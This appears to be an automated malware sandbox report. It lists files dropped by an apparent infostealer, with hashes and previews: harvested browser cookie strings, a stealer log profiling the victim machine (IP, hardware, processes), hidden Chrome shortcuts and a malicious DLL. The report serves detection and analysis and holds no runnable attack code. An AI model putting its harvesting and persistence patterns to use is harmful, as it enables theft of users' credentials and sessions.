Malicious: false
Reputation: unknown
Preview: .google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..

Process: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type: ASCII text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 6044
Entropy (8bit): 5.358609262874232
Encrypted: false
SSDEEP: 96:xfaAgZRyxc2KBhA6tsxODsuz7stAGPhJODtImb8PyRe8cEI3c5Tlb/QdquAukMPD:x4YxX6tsxPuO1B
MD5: 49DF0B1B855E249204D567C7AB6A7F71
SHA1: 38A3CB7803FFF4D320973BDCC63242447B4CF611
SHA-256: 926F68BB5963FD4C9A919FEC1770505BF153C4B119BBC4F49E5BEBB0D2312C2C
SHA-512: 78BC85B87A7788953329662332FBD22E3381269BCA81776F4B3684B2BB30BE5ED05906C04E6EE2B0CC8730DDA924C1575497B7381A723FA8DA2BA8422A6D87D3
Malicious: false
Reputation: unknown
Preview: Build: bladak..Version: 1.9....Date: Tue Apr 23 21:34:24 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 36378f5187071de74b297841946417f8....Path: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixyR5OV7OYq0nWL....IP: 89.187.171.132..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 932923 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 23/4/2024 21:34:24..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe

Process: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type: Unicode text, UTF-8 text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 4897
Entropy (8bit): 2.518316437186352
Encrypted: false
SSDEEP: 48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
MD5: B3E9D0E1B8207AA74CB8812BAAF52EAE
SHA1: A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
SHA-256: 4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
SHA-512: B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
Malicious: false
Reputation: unknown

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: ASCII text, with very long lines (369), with CRLF line terminators
Category: dropped
Size (bytes): 1060
Entropy (8bit): 5.999391385907715
Encrypted: false
SSDEEP: 24:KauS79Gr4iSllJALQZ73auS79Gr4iSllJALQZ7c:KauS7GAfJUu73auS7GAfJUu7c
MD5: C0ADF7485C183F86B6E5146BBCAD794B
SHA1: 1F31AF65C794F1C146C90F710035734C2D309AE6
SHA-256: B9DE707D979A9939290146CBFD7769E6121A43BCCF04ED0731C6108F47577CE6
SHA-512: E23D818BC20E47A8183F4B6AA2CE79B72CFF805ACC6BAAFCB009F372FD8F498522340EEC54621A8A219A8DCE019308137774ABFC35AE15941869B85BA7FA8085
Malicious: false
Reputation: unknown
Preview: .google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpB

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: ASCII text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 6124
Entropy (8bit): 5.351936234031666
Encrypted: false
SSDEEP: 96:xf7vZRy+c2KBhA6tsxODsuz7stAGPhJODtImb8PyRe8cEI3c5Tlb/QdquAukMPEN:x9Y+X6tsxPuOmB
MD5: 2A201E1A166EF474F829C85E22B67841
SHA1: 4775C5D81A656D25954FA8F3645BB57B9ADEE0BE
SHA-256: B6CC874EAF58CEC3241E4E3AC5696084A4AACF8EFC0EC41B95A15C99F4AC54DB
SHA-512: 2D3C4EF445740ED392F2B586E8FC1B058AB83B127466C9AFEDD8AE5131679B34FB814ECBC77DB587392F6F14430D5A7EB03E758A73D0028D421DAE1AB63064BA
Malicious: false
Reputation: unknown
Preview: Build: bladak..Version: 1.9....Date: Tue Apr 23 21:34:34 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 36378f5187071de74b297841946417f8....Path: C:\ProgramData\MPGPH131\MPGPH131.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixyo6nZvZGi7n6F....IP: 89.187.171.132..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 932923 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 23/4/2024 21:34:34..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: Unicode text, UTF-8 text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 4897
Entropy (8bit): 2.518316437186352
Encrypted: false
SSDEEP: 48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
MD5: B3E9D0E1B8207AA74CB8812BAAF52EAE
SHA1: A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
SHA-256: 4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
SHA-512: B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
Malicious: false
Reputation: unknown

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2677
Entropy (8bit): 3.9773432858804916
Encrypted: false
SSDEEP: 48:8GB42dSOTyKxRbHjidAKZdA19ehwiZUklqehNy+3:8GBtj5qy
MD5: 3063A85E5F0AEF5E16562A046E0D5A81
SHA1: 199817E61662D96D00394569F3889B8720C27543
SHA-256: 7E17DCF8CBE4E115A4B02318D33B7DF8D05948941CF871004660F922F3FF6973
SHA-512: 30A69C77EBBD486A5F19D5D0B29AAF30C1E329A68D02061F6D0856A1C88D6DCB61756C6166C05D0DAD1D5D43AF2075B92272DF9253F234020488E336B0A8D76F
Malicious: false
Reputation: unknown
Preview: L..................F.@.. ...$+.,....A..6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                        Entropy (8bit):3.9944176996105787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8O2dSOTyKxRbHjidAKZdA1weh/iZUkAQkqehay+2:8fjr9QDy
                                                                                                                                                                                                                                        MD5:3BE8842F42F8EA13D0C6E6F8D6FD3323
                                                                                                                                                                                                                                        SHA1:B2659CAFA9BE905103374A3937B94DC51D94085C
                                                                                                                                                                                                                                        SHA-256:7B5EF141C83819D0C2E135B48A53AAA6C276E1E013F3BC4093FD51CF4560E349
                                                                                                                                                                                                                                        SHA-512:2F393F092A77DDB8EAF1956FDFD14B4F6814FC7AEDC4D878810D81CE77BFB773B54653D7E22500A48B4E0A61B393FE0F936476BEE30DA3935BCC5543B034C22D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....v6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                                        Entropy (8bit):4.004557087724535
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8xV2dSOTyKxRsHjidAKZdA14tseh7sFiZUkmgqeh7sQy+BX:8xMj2nuy
                                                                                                                                                                                                                                        MD5:C76858F63CB9E6D1BB6DD39AA269E3CB
                                                                                                                                                                                                                                        SHA1:6AD2C96E0D8E1AA8E8CE8FC97D1C423DC60212C3
                                                                                                                                                                                                                                        SHA-256:113DEA87E28FA7F29CCEE0915527C484B2890305FC32788C5319A272DF55D933
                                                                                                                                                                                                                                        SHA-512:240502C7488AF9FE4F554D972D83C4CBA9EE622ECC709FFE6C1C11695A6E6B597A2B99F913D96C46CE5B9297F5662D7906E85605765428DED63A6CE9B77C96B6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                        Entropy (8bit):3.99018874605566
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8W2dSOTyKxRbHjidAKZdA1vehDiZUkwqehWy+R:83joYy
                                                                                                                                                                                                                                        MD5:BAE5DCF3E04008EBAEFB5A63B63BB10E
                                                                                                                                                                                                                                        SHA1:1FD393E8CED5CC5D88C207C5E4864358FE7C92B2
                                                                                                                                                                                                                                        SHA-256:BB1C669CBC53C0845842E54D7670E08EB9CB6C89C9616254DB092DB9C2FD0453
                                                                                                                                                                                                                                        SHA-512:2B0F9A4A6DD64CBB926DC6362CEEF8650FB4B0768422D118E92A07ED1D45C7325FFD0755FC82653220617845391AED98556CE194660974F2A2D41087FEE998F3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....s]o6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                        Entropy (8bit):3.981170729251942
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8042dSOTyKxRbHjidAKZdA1hehBiZUk1W1qehky+C:84j49Ey
                                                                                                                                                                                                                                        MD5:C8D2D6D9D6FD607398A2275089247F02
                                                                                                                                                                                                                                        SHA1:598C79905C73C3E8EECD70655E833475F6EDED36
                                                                                                                                                                                                                                        SHA-256:189816EB3E8BC556431F28810E4AB1239FA361D3AD0CACBF541A0BE358D501A1
                                                                                                                                                                                                                                        SHA-512:366D78DDC6508FF020BEF3C0F513B9B7FF6C3139D30AFE7A5B55C99023EF61F515256B1DF2303FC88174C3C213C673B9BA1153E3DFA04A8B7C198B4260C01915
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....;.6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                                                        Entropy (8bit):3.9905717892793793
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8JA2dSOTyKxRbHjidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbuy+yT+:8TjWT/TbxWOvTbuy7T
                                                                                                                                                                                                                                        MD5:4F7303520F705BBCB72C76B4E227608E
                                                                                                                                                                                                                                        SHA1:54BA5F537EA62E28F9298A2178D62B7060024992
                                                                                                                                                                                                                                        SHA-256:0805745057D8B5872CAD1E92BFF805BA5B72DBF28F08CAB50419572EB1901B73
                                                                                                                                                                                                                                        SHA-512:84AF7A2E3D5C79C782EA4A994B555012A972455BF98B576F56FD95AB084B6CB43E615A566F5CA849E7323750D1C5B4FBD4F0219B38571136D43ADD246A409FCA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....Pd6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 18:35:34 2024, mtime=Tue Apr 23 18:35:34 2024, atime=Tue Apr 23 18:35:33 2024, length=2469936, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):987
                                                                                                                                                                                                                                        Entropy (8bit):5.005138030887183
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:8sI4fVA88COlsY//WjLm/17C8wPyllAzKpyZ2mjAu9HyB4gXURUJJoDuZ2UBmV:8Mfl8FZ+3mtOfaompydAjB4SaUCuzBm
                                                                                                                                                                                                                                        MD5:59D91D7A8BFF0A9E61EC8C642C752EB4
                                                                                                                                                                                                                                        SHA1:98E7CCDFFE44D1E03CD951498EFC971612365105
                                                                                                                                                                                                                                        SHA-256:06F0592EAF0F27F929CDA3521B18C61BB71F343253F42977A4045C02FD127F00
SHA-512:58E3F6CA300412B11C410B9AFE08AD28D46ECBBD41DB73259D60D4395B4F31006D5531CAB29FA3183096E3641D40B165FD5E43650BABDA520405B2F8638D3EDA
Malicious:false
Reputation:unknown
Preview:L..................F.... ......h....q..h.....<eh....0.%.......................:..DG..Yr?.D..U..k0.&...&...... M......14*.....vPo........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X;.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Xu...Roaming.@......DWSl.Xu.....C.....................Y...R.o.a.m.i.n.g.....n.1......Xr...DRIVER~1..V......Xr..Xt............................!.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.....z.2.0.%..Xq. .UNIVER~1.EXE..^......Xr..Xr...... ....................".\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.......x...............-.......w............P.{.....C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe..7.....\.....\.R.o.a.m.i.n.g.\.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.`.......X.......932923...........hT..CrF.f4... .uW.......,...W..hT..CrF.f4... .uW.......,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
Process:C:\Windows\System32\svchost.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 18:35:34 2024, mtime=Tue Apr 23 18:35:34 2024, atime=Tue Apr 23 18:35:33 2024, length=2469936, window=hide
Category:dropped
Size (bytes):987
Entropy (8bit):5.005138030887183
Encrypted:false
SSDEEP:12:8sI4fVA88COlsY//WjLm/17C8wPyllAzKpyZ2mjAu9HyB4gXURUJJoDuZ2UBmV:8Mfl8FZ+3mtOfaompydAjB4SaUCuzBm
MD5:59D91D7A8BFF0A9E61EC8C642C752EB4
SHA1:98E7CCDFFE44D1E03CD951498EFC971612365105
SHA-256:06F0592EAF0F27F929CDA3521B18C61BB71F343253F42977A4045C02FD127F00
SHA-512:58E3F6CA300412B11C410B9AFE08AD28D46ECBBD41DB73259D60D4395B4F31006D5531CAB29FA3183096E3641D40B165FD5E43650BABDA520405B2F8638D3EDA
Malicious:false
Reputation:unknown
Preview:L..................F.... ......h....q..h.....<eh....0.%.......................:..DG..Yr?.D..U..k0.&...&...... M......14*.....vPo........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X;.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Xu...Roaming.@......DWSl.Xu.....C.....................Y...R.o.a.m.i.n.g.....n.1......Xr...DRIVER~1..V......Xr..Xt............................!.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.....z.2.0.%..Xq. .UNIVER~1.EXE..^......Xr..Xr...... ....................".\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.......x...............-.......w............P.{.....C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe..7.....\.....\.R.o.a.m.i.n.g.\.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.`.......X.......932923...........hT..CrF.f4... .uW.......,...W..hT..CrF.f4... .uW.......,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):112128
Entropy (8bit):6.400356358225577
Encrypted:false
SSDEEP:3072:D4uSD+ZwruS0bGYuZRtasSVh/QEIegRQod4l:kuTiabruZR8JSlD4l
MD5:154C3F1334DD435F562672F2664FEA6B
SHA1:51DD25E2BA98B8546DE163B8F26E2972A90C2C79
SHA-256:5F431129F97F3D56929F1E5584819E091BD6C854D7E18503074737FC6D79E33F
SHA-512:1BCA69BBCDB7ECD418769E9D4BEFC458F9F8E3CEE81FEB7316BB61E189E2904F4431E4CC7D291E179A5DEC441B959D428D8E433F579036F763BBAD6460222841
Malicious:true
Yara Hits:
